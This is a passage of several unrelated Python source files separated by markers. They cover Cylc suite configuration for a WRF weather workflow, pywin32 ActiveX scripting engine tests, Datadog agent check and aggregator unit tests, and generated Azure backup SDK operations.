"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_wrfda(self):
'''
define suite.rc runtime information: wrfda
'''
wrfda_run = "wrfda_run.py $CYLC_TASK_CYCLE_POINT"
# define template
template = """
[[wrfda]]
script = \"\"\"
{wrfda_run}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}"""
# context variables in template
context = {
"wrfda_run": wrfda_run,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_upp(self):
'''
define suite.rc runtime information: wrfda
'''
# define template
template = """
[[upp]]
script = \"\"\"
{command}
\"\"\"
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}
"""
command = "upp.py $CYLC_TASK_CYCLE_POINT"
context = {
"command": command,
"method": "background",
"directives": ""
}
return template.format(**context)
def _runtime_wps(self):
'''
define suite.rc runtime information: wrfda
'''
# define template
template = """
[[wps]]
pre-script = \"\"\"
{pre_command}
\"\"\"
script = \"\"\"
{command}
\"\"\"
post-script = \"\"\"
{post_command}
\"\"\"
[[[environment]]]
WORKDIR = {wps_workdir}
CYLC_TASK_WORK_DIR = $WORKDIR
[[[job submission]]]
method = {method}
[[[directives]]]
{directives}
"""
pre_command = "wps_init.py $CYLC_TASK_CYCLE_POINT {wps_run_hours}"
pre_command_context = {
"wps_run_hours": self.wps_interval_hours,
}
command = "wps_run.py"
command_context = {
"wps_dir": self.config['filesystem']['wps_dir']
}
post_command = "wps_post.py"
context = {
"wps_workdir": os.path.join(self.config['filesystem']['work_dir'],
'wps'),
"pre_command": pre_command.format(**pre_command_context),
"command": command.format(**command_context),
"post_command": post_command,
"method": "background",
"directives": ""
}
return template.format(**context)
def _visualization(self):
'''
define suite.rc visualization information
'''
# define template
template = """
[visualization]
initial cycle point = {{ START }}
final cycle point = {{ STOP }}
default node attributes = "style=filled", "fillcolor=grey"
"""
return template
def _write(self, suiterc, filename):
'''
write cylc suite.rc config to file
'''
# create the itag file and write content to it based on the template
try:
with open(filename, 'w') as itag:
itag.write(suiterc)
except IOError:
raise # re-raise exception
| |
import sys
import pythoncom
from win32com.axscript.server.error import Exception
from win32com.axscript import axscript
from win32com.axscript.server import axsite
from win32com.server import util, connect
import win32com.server.policy
from win32com.client.dynamic import Dispatch
from win32com.server.exception import COMException
import unittest
import win32com.test.util
verbose = "-v" in sys.argv
class MySite(axsite.AXSite):
def __init__(self, *args):
self.exception_seen = None
axsite.AXSite.__init__(self, *args)
def OnScriptError(self, error):
self.exception_seen = exc = error.GetExceptionInfo()
context, line, char = error.GetSourcePosition()
if not verbose:
return
print(" >Exception:", exc[1])
try:
st = error.GetSourceLineText()
except pythoncom.com_error:
st = None
if st is None: st = ""
text = st + "\n" + (" " * (char-1)) + "^" + "\n" + exc[2]
for line in text.splitlines():
print(" >" + line)
class MyCollection(util.Collection):
def _NewEnum(self):
return util.Collection._NewEnum(self)
class Test:
_public_methods_ = [ 'echo', 'fail' ]
_public_attrs_ = ['collection']
def __init__(self):
self.verbose = verbose
self.collection = util.wrap( MyCollection( [1,'Two',3] ))
self.last = ""
self.fail_called = 0
# self._connect_server_ = TestConnectServer(self)
def echo(self, *args):
self.last = "".join([str(s) for s in args])
if self.verbose:
for arg in args:
print(arg, end=' ')
print()
def fail(self, *args):
print("**** fail() called ***")
for arg in args:
print(arg, end=' ')
print()
self.fail_called = 1
# self._connect_server_.Broadcast(last)
#### Connections currently wont work, as there is no way for the engine to
#### know what events we support. We need typeinfo support.
IID_ITestEvents = pythoncom.MakeIID("{8EB72F90-0D44-11d1-9C4B-00AA00125A98}")
class TestConnectServer(connect.ConnectableServer):
_connect_interfaces_ = [IID_ITestEvents]
# The single public method that the client can call on us
# (ie, as a normal COM server, this exposes just this single method.
def __init__(self, object):
self.object = object
def Broadcast(self,arg):
# Simply broadcast a notification.
self._BroadcastNotify(self.NotifyDoneIt, (arg,))
def NotifyDoneIt(self, interface, arg):
interface.Invoke(1000, 0, pythoncom.DISPATCH_METHOD, 1, arg)
VBScript = """\
prop = "Property Value"
sub hello(arg1)
test.echo arg1
end sub
sub testcollection
if test.collection.Item(0) <> 1 then
test.fail("Index 0 was wrong")
end if
if test.collection.Item(1) <> "Two" then
test.fail("Index 1 was wrong")
end if
if test.collection.Item(2) <> 3 then
test.fail("Index 2 was wrong")
end if
num = 0
for each item in test.collection
num = num + 1
next
if num <> 3 then
test.fail("Collection didn't have 3 items")
end if
end sub
"""
PyScript = """\
# A unicode \xa9omment.
prop = "Property Value"
def hello(arg1):
test.echo(arg1)
def testcollection():
# test.collection[1] = "New one"
got = []
for item in test.collection:
got.append(item)
if got != [1, "Two", 3]:
test.fail("Didn't get the collection")
pass
"""
# XXX - needs py3k work! Throwing a bytes string with an extended char
# doesn't make much sense, but py2x allows it. What it gets upset with
# is a real unicode arg - which is the only thing py3k allows!
PyScript_Exc = """\
def hello(arg1):
raise RuntimeError("exc with extended \xa9har")
"""
ErrScript = """\
bad code for everyone!
"""
state_map = {
axscript.SCRIPTSTATE_UNINITIALIZED: "SCRIPTSTATE_UNINITIALIZED",
axscript.SCRIPTSTATE_INITIALIZED: "SCRIPTSTATE_INITIALIZED",
axscript.SCRIPTSTATE_STARTED: "SCRIPTSTATE_STARTED",
axscript.SCRIPTSTATE_CONNECTED: "SCRIPTSTATE_CONNECTED",
axscript.SCRIPTSTATE_DISCONNECTED: "SCRIPTSTATE_DISCONNECTED",
axscript.SCRIPTSTATE_CLOSED: "SCRIPTSTATE_CLOSED",
}
def _CheckEngineState(engine, name, state):
got = engine.engine.eScript.GetScriptState()
if got != state:
got_name = state_map.get(got, str(got))
state_name = state_map.get(state, str(state))
raise RuntimeError("Warning - engine %s has state %s, but expected %s" % (name, got_name, state_name))
class EngineTester(win32com.test.util.TestCase):
def _TestEngine(self, engineName, code, expected_exc = None):
echoer = Test()
model = {
'test' : util.wrap(echoer),
}
site = MySite(model)
engine = site._AddEngine(engineName)
try:
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
engine.AddCode(code)
engine.Start()
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_STARTED)
self.failUnless(not echoer.fail_called, "Fail should not have been called")
# Now call into the scripts IDispatch
ob = Dispatch(engine.GetScriptDispatch())
try:
ob.hello("Goober")
self.failUnless(expected_exc is None,
"Expected %r, but no exception seen" % (expected_exc,))
except pythoncom.com_error:
if expected_exc is None:
self.fail("Unexpected failure from script code: %s" % (site.exception_seen,))
if expected_exc not in site.exception_seen[2]:
self.fail("Could not find %r in %r" % (expected_exc, site.exception_seen[2]))
return
self.assertEqual(echoer.last, "Goober")
self.assertEqual(str(ob.prop), "Property Value")
ob.testcollection()
self.failUnless(not echoer.fail_called, "Fail should not have been called")
# Now make sure my engines can evaluate stuff.
result = engine.eParse.ParseScriptText("1+1", None, None, None, 0, 0, axscript.SCRIPTTEXT_ISEXPRESSION)
self.assertEqual(result, 2)
# re-initialize to make sure it transitions back to initialized again.
engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
engine.Start()
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_STARTED)
# Transition back to initialized, then through connected too.
engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
engine.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_CONNECTED)
engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
engine.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_CONNECTED)
engine.SetScriptState(axscript.SCRIPTSTATE_DISCONNECTED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_DISCONNECTED)
finally:
engine.Close()
engine = None
site = None
def testVB(self):
self._TestEngine("VBScript", VBScript)
def testPython(self):
self._TestEngine("Python", PyScript)
def testPythonUnicodeError(self):
self._TestEngine("Python", PyScript)
def testVBExceptions(self):
self.assertRaises(pythoncom.com_error,
self._TestEngine, "VBScript", ErrScript)
def testPythonExceptions(self):
expected = "RuntimeError: exc with extended \xa9har"
self._TestEngine("Python", PyScript_Exc, expected)
if __name__ == '__main__':
unittest.main()
| |
# stdlib
import logging
import os
import time
import unittest
# project
from aggregator import MetricsAggregator
from checks import (
AgentCheck,
Check,
CheckException,
Infinity,
UnknownValue,
)
from checks.collector import Collector
from tests.checks.common import load_check
from util import get_hostname
from utils.ntp import NTPUtil
from utils.proxy import get_proxy
logger = logging.getLogger()
class TestCore(unittest.TestCase):
"Tests to validate the core check logic"
def setUp(self):
self.c = Check(logger)
self.c.gauge("test-metric")
self.c.counter("test-counter")
def setUpAgentCheck(self):
self.ac = AgentCheck('test', {}, {'checksd_hostname': "foo"})
def test_gauge(self):
self.assertEquals(self.c.is_gauge("test-metric"), True)
self.assertEquals(self.c.is_counter("test-metric"), False)
self.c.save_sample("test-metric", 1.0)
# call twice in a row, should be invariant
self.assertEquals(self.c.get_sample("test-metric"), 1.0)
self.assertEquals(self.c.get_sample("test-metric"), 1.0)
self.assertEquals(self.c.get_sample_with_timestamp("test-metric")[1], 1.0)
# new value, old one should be gone
self.c.save_sample("test-metric", 2.0)
self.assertEquals(self.c.get_sample("test-metric"), 2.0)
self.assertEquals(len(self.c._sample_store["test-metric"]), 1)
# with explicit timestamp
self.c.save_sample("test-metric", 3.0, 1298066183.607717)
self.assertEquals(self.c.get_sample_with_timestamp("test-metric"), (1298066183.607717, 3.0, None, None))
# get_samples()
self.assertEquals(self.c.get_samples(), {"test-metric": 3.0})
def testEdgeCases(self):
self.assertRaises(CheckException, self.c.get_sample, "unknown-metric")
# same value
self.c.save_sample("test-counter", 1.0, 1.0)
self.c.save_sample("test-counter", 1.0, 1.0)
self.assertRaises(Infinity, self.c.get_sample, "test-counter")
def test_counter(self):
self.c.save_sample("test-counter", 1.0, 1.0)
self.assertRaises(UnknownValue, self.c.get_sample, "test-counter", expire=False)
self.c.save_sample("test-counter", 2.0, 2.0)
self.assertEquals(self.c.get_sample("test-counter", expire=False), 1.0)
self.assertEquals(self.c.get_sample_with_timestamp("test-counter", expire=False), (2.0, 1.0, None, None))
self.assertEquals(self.c.get_samples(expire=False), {"test-counter": 1.0})
self.c.save_sample("test-counter", -2.0, 3.0)
self.assertRaises(UnknownValue, self.c.get_sample_with_timestamp, "test-counter")
def test_tags(self):
# Test metric tagging
now = int(time.time())
# Tag metrics
self.c.save_sample("test-counter", 1.0, 1.0, tags = ["tag1", "tag2"])
self.c.save_sample("test-counter", 2.0, 2.0, tags = ["tag1", "tag2"])
# Only 1 point recording for this combination of tags, won't be sent
self.c.save_sample("test-counter", 3.0, 3.0, tags = ["tag1", "tag3"])
self.c.save_sample("test-metric", 3.0, now, tags = ["tag3", "tag4"])
# Arg checks
self.assertRaises(CheckException, self.c.save_sample, "test-metric", 4.0, now + 5, tags = "abc")
# This is a different combination of tags
self.c.save_sample("test-metric", 3.0, now, tags = ["tag5", "tag3"])
results = self.c.get_metrics()
results.sort()
self.assertEquals(results,
[("test-counter", 2.0, 1.0, {"tags": ["tag1", "tag2"]}),
("test-metric", now, 3.0, {"tags": ["tag3", "tag4"]}),
("test-metric", now, 3.0, {"tags": ["tag3", "tag5"]}),
])
# Tagged metrics are not available through get_samples anymore
self.assertEquals(self.c.get_samples(), {})
def test_samples(self):
self.assertEquals(self.c.get_samples(), {})
self.c.save_sample("test-metric", 1.0, 0.0) # value, ts
self.c.save_sample("test-counter", 1.0, 1.0) # value, ts
self.c.save_sample("test-counter", 4.0, 2.0) # value, ts
assert "test-metric" in self.c.get_samples_with_timestamps(expire=False), self.c.get_samples_with_timestamps(expire=False)
self.assertEquals(self.c.get_samples_with_timestamps(expire=False)["test-metric"], (0.0, 1.0, None, None))
assert "test-counter" in self.c.get_samples_with_timestamps(expire=False), self.c.get_samples_with_timestamps(expire=False)
self.assertEquals(self.c.get_samples_with_timestamps(expire=False)["test-counter"], (2.0, 3.0, None, None))
def test_name(self):
self.assertEquals(self.c.normalize("metric"), "metric")
self.assertEquals(self.c.normalize("metric", "prefix"), "prefix.metric")
self.assertEquals(self.c.normalize("__metric__", "prefix"), "prefix.metric")
self.assertEquals(self.c.normalize("abc.metric(a+b+c{}/5)", "prefix"), "prefix.abc.metric_a_b_c_5")
self.assertEquals(self.c.normalize("VBE.default(127.0.0.1,,8080).happy", "varnish"), "varnish.VBE.default_127.0.0.1_8080.happy")
# Same tests for the AgentCheck
self.setUpAgentCheck()
self.assertEquals(self.ac.normalize("metric"), "metric")
self.assertEquals(self.ac.normalize("metric", "prefix"), "prefix.metric")
self.assertEquals(self.ac.normalize("__metric__", "prefix"), "prefix.metric")
self.assertEquals(self.ac.normalize("abc.metric(a+b+c{}/5)", "prefix"), "prefix.abc.metric_a_b_c_5")
self.assertEquals(self.ac.normalize("VBE.default(127.0.0.1,,8080).happy", "varnish"), "varnish.VBE.default_127.0.0.1_8080.happy")
self.assertEqual(self.ac.normalize("PauseTotalNs", "prefix", fix_case = True), "prefix.pause_total_ns")
self.assertEqual(self.ac.normalize("Metric.wordThatShouldBeSeparated", "prefix", fix_case = True), "prefix.metric.word_that_should_be_separated")
def test_service_check(self):
check_name = 'test.service_check'
status = AgentCheck.CRITICAL
tags = ['host:test', 'other:thing']
host_name = 'foohost'
timestamp = time.time()
check = AgentCheck('test', {}, {'checksd_hostname':'foo'})
check.service_check(check_name, status, tags, timestamp, host_name)
self.assertEquals(len(check.service_checks), 1, check.service_checks)
val = check.get_service_checks()
self.assertEquals(len(val), 1)
check_run_id = val[0].get('id', None)
self.assertNotEquals(check_run_id, None)
self.assertEquals([{
'id': check_run_id,
'check': check_name,
'status': status,
'host_name': host_name,
'tags': tags,
'timestamp': timestamp,
'message': None,
}], val)
self.assertEquals(len(check.service_checks), 0, check.service_checks)
def test_collector(self):
agentConfig = {
'api_key': 'test_apikey',
'check_timings': True,
'collect_ec2_tags': True,
'collect_instance_metadata': False,
'create_dd_check_tags': False,
'version': 'test',
'tags': '',
}
# Run a single checks.d check as part of the collector.
redis_config = {
"init_config": {},
"instances": [{"host": "localhost", "port": 6379}]
}
checks = [load_check('redisdb', redis_config, agentConfig)]
c = Collector(agentConfig, [], {}, get_hostname(agentConfig))
payload = c.run({
'initialized_checks': checks,
'init_failed_checks': {}
})
metrics = payload['metrics']
# Check that we got a timing metric for all checks.
timing_metrics = [m for m in metrics
if m[0] == 'datadog.agent.check_run_time']
all_tags = []
for metric in timing_metrics:
all_tags.extend(metric[3]['tags'])
for check in checks:
tag = "check:%s" % check.name
assert tag in all_tags, all_tags
def test_apptags(self):
'''
Tests that the app tags are sent if specified so
'''
agentConfig = {
'api_key': 'test_apikey',
'collect_ec2_tags': False,
'collect_instance_metadata': False,
'create_dd_check_tags': True,
'version': 'test',
'tags': '',
}
# Run a single checks.d check as part of the collector.
redis_config = {
"init_config": {},
"instances": [{"host": "localhost", "port": 6379}]
}
checks = [load_check('redisdb', redis_config, agentConfig)]
c = Collector(agentConfig, [], {}, get_hostname(agentConfig))
payload = c.run({
'initialized_checks': checks,
'init_failed_checks': {}
})
# We check that the redis DD_CHECK_TAG is sent in the payload
self.assertTrue('dd_check:redisdb' in payload['host-tags']['system'])
def test_no_proxy(self):
""" Starting with Agent 5.0.0, there should always be a local forwarder
running and all payloads should go through it. So we should make sure
that we pass the no_proxy environment variable that will be used by requests
(See: https://github.com/kennethreitz/requests/pull/945 )
"""
from requests.utils import get_environ_proxies
from os import environ as env
env["http_proxy"] = "http://localhost:3128"
env["https_proxy"] = env["http_proxy"]
env["HTTP_PROXY"] = env["http_proxy"]
env["HTTPS_PROXY"] = env["http_proxy"]
self.assertTrue("no_proxy" in env)
self.assertEquals(env["no_proxy"], "127.0.0.1,localhost,169.254.169.254")
self.assertEquals({}, get_environ_proxies(
"http://localhost:17123/intake"))
expected_proxies = {
'http': 'http://localhost:3128',
'https': 'http://localhost:3128',
'no': '127.0.0.1,localhost,169.254.169.254'
}
environ_proxies = get_environ_proxies("https://www.google.com")
self.assertEquals(expected_proxies, environ_proxies,
(expected_proxies, environ_proxies))
# Clear the env variables set
del env["http_proxy"]
del env["https_proxy"]
if "HTTP_PROXY" in env:
# on some platforms (e.g. Windows) env var names are case-insensitive, so we have to avoid
# deleting the same key twice
del env["HTTP_PROXY"]
del env["HTTPS_PROXY"]
def test_get_proxy(self):
agentConfig = {
"proxy_host": "localhost",
"proxy_port": 4242,
"proxy_user": "foo",
"proxy_password": "bar"
}
proxy_from_config = get_proxy(agentConfig)
self.assertEqual(proxy_from_config,
{
"host": "localhost",
"port": 4242,
"user": "foo",
"password": "bar",
})
os.environ["HTTPS_PROXY"] = "https://fooenv:barenv@google.com:4444"
proxy_from_env = get_proxy({})
self.assertEqual(proxy_from_env,
{
"host": "google.com",
"port": 4444,
"user": "fooenv",
"password": "barenv"
})
def test_min_collection_interval(self):
config = {'instances': [{}], 'init_config': {}}
agentConfig = {
'version': '0.1',
'api_key': 'toto'
}
# default min collection interval for that check was 20sec
check = load_check('disk', config, agentConfig)
check.DEFAULT_MIN_COLLECTION_INTERVAL = 20
check.run()
metrics = check.get_metrics()
self.assertTrue(len(metrics) > 0, metrics)
check.run()
metrics = check.get_metrics()
# No metrics should be collected as it's too early
self.assertEquals(len(metrics), 0, metrics)
# equivalent to time.sleep(20)
check.last_collection_time[0] -= 20
check.run()
metrics = check.get_metrics()
self.assertTrue(len(metrics) > 0, metrics)
check.last_collection_time[0] -= 3
check.run()
metrics = check.get_metrics()
self.assertEquals(len(metrics), 0, metrics)
check.DEFAULT_MIN_COLLECTION_INTERVAL = 0
check.run()
metrics = check.get_metrics()
self.assertTrue(len(metrics) > 0, metrics)
config = {'instances': [{'min_collection_interval':3}], 'init_config': {}}
check = load_check('disk', config, agentConfig)
check.run()
metrics = check.get_metrics()
self.assertTrue(len(metrics) > 0, metrics)
check.run()
metrics = check.get_metrics()
self.assertEquals(len(metrics), 0, metrics)
check.last_collection_time[0] -= 4
check.run()
metrics = check.get_metrics()
self.assertTrue(len(metrics) > 0, metrics)
config = {'instances': [{'min_collection_interval': 12}], 'init_config': {'min_collection_interval':3}}
check = load_check('disk', config, agentConfig)
check.run()
metrics = check.get_metrics()
self.assertTrue(len(metrics) > 0, metrics)
check.run()
metrics = check.get_metrics()
self.assertEquals(len(metrics), 0, metrics)
check.last_collection_time[0] -= 4
check.run()
metrics = check.get_metrics()
self.assertEquals(len(metrics), 0, metrics)
check.last_collection_time[0] -= 8
check.run()
metrics = check.get_metrics()
self.assertTrue(len(metrics) > 0, metrics)
def test_ntp_global_settings(self):
# Clear any existing ntp config
NTPUtil._drop()
config = {'instances': [{
"host": "foo.com",
"port": "bar",
"version": 42,
"timeout": 13.37}],
'init_config': {}}
agentConfig = {
'version': '0.1',
'api_key': 'toto'
}
# load this config in the ntp singleton
ntp_util = NTPUtil(config)
# default min collection interval for that check was 20sec
check = load_check('ntp', config, agentConfig)
check.run()
self.assertEqual(ntp_util.args["host"], "foo.com")
self.assertEqual(ntp_util.args["port"], "bar")
self.assertEqual(ntp_util.args["version"], 42)
self.assertEqual(ntp_util.args["timeout"], 13.37)
# Clear the singleton to prepare for next config
NTPUtil._drop()
config = {'instances': [{}], 'init_config': {}}
agentConfig = {
'version': '0.1',
'api_key': 'toto'
}
# load the new config
ntp_util = NTPUtil(config)
# default min collection interval for that check was 20sec
check = load_check('ntp', config, agentConfig)
try:
check.run()
except Exception:
pass
self.assertTrue(ntp_util.args["host"].endswith("datadog.pool.ntp.org"))
self.assertEqual(ntp_util.args["port"], "ntp")
self.assertEqual(ntp_util.args["version"], 3)
self.assertEqual(ntp_util.args["timeout"], 1.0)
NTPUtil._drop()
class TestAggregator(unittest.TestCase):
def setUp(self):
self.aggr = MetricsAggregator('test-aggr')
def test_dupe_tags(self):
self.aggr.increment('test-counter', 1, tags=['a', 'b'])
self.aggr.increment('test-counter', 1, tags=['a', 'b', 'b'])
self.assertEquals(len(self.aggr.metrics), 1, self.aggr.metrics)
metric = self.aggr.metrics.values()[0]
self.assertEquals(metric.value, 2)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_request(
vault_name: str,
resource_group_name: str,
subscription_id: str,
fabric_name: str,
container_name: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}')
path_format_arguments = {
"vaultName": _SERIALIZER.url("vault_name", vault_name, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"fabricName": _SERIALIZER.url("fabric_name", fabric_name, 'str'),
"containerName": _SERIALIZER.url("container_name", container_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_register_request(
vault_name: str,
resource_group_name: str,
subscription_id: str,
fabric_name: str,
container_name: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}')
path_format_arguments = {
"vaultName": _SERIALIZER.url("vault_name", vault_name, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"fabricName": _SERIALIZER.url("fabric_name", fabric_name, 'str'),
"containerName": _SERIALIZER.url("container_name", container_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
def build_unregister_request(
vault_name: str,
resource_group_name: str,
subscription_id: str,
fabric_name: str,
container_name: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}')
path_format_arguments = {
"vaultName": _SERIALIZER.url("vault_name", vault_name, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"fabricName": _SERIALIZER.url("fabric_name", fabric_name, 'str'),
"containerName": _SERIALIZER.url("container_name", container_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_inquire_request(
vault_name: str,
resource_group_name: str,
subscription_id: str,
fabric_name: str,
container_name: str,
*,
filter: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}/inquire')
path_format_arguments = {
"vaultName": _SERIALIZER.url("vault_name", vault_name, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"fabricName": _SERIALIZER.url("fabric_name", fabric_name, 'str'),
"containerName": _SERIALIZER.url("container_name", container_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
if filter is not None:
query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_refresh_request(
vault_name: str,
resource_group_name: str,
subscription_id: str,
fabric_name: str,
*,
filter: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/refreshContainers')
path_format_arguments = {
"vaultName": _SERIALIZER.url("vault_name", vault_name, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"fabricName": _SERIALIZER.url("fabric_name", fabric_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
if filter is not None:
query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class ProtectionContainersOperations(object):
"""ProtectionContainersOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.recoveryservicesbackup.activestamp.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def get(
self,
vault_name: str,
resource_group_name: str,
fabric_name: str,
container_name: str,
**kwargs: Any
) -> "_models.ProtectionContainerResource":
"""Gets details of the specific container registered to your Recovery Services Vault.
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param fabric_name: Name of the fabric where the container belongs.
:type fabric_name: str
:param container_name: Name of the container whose details need to be fetched.
:type container_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProtectionContainerResource, or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionContainerResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProtectionContainerResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
fabric_name=fabric_name,
container_name=container_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProtectionContainerResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
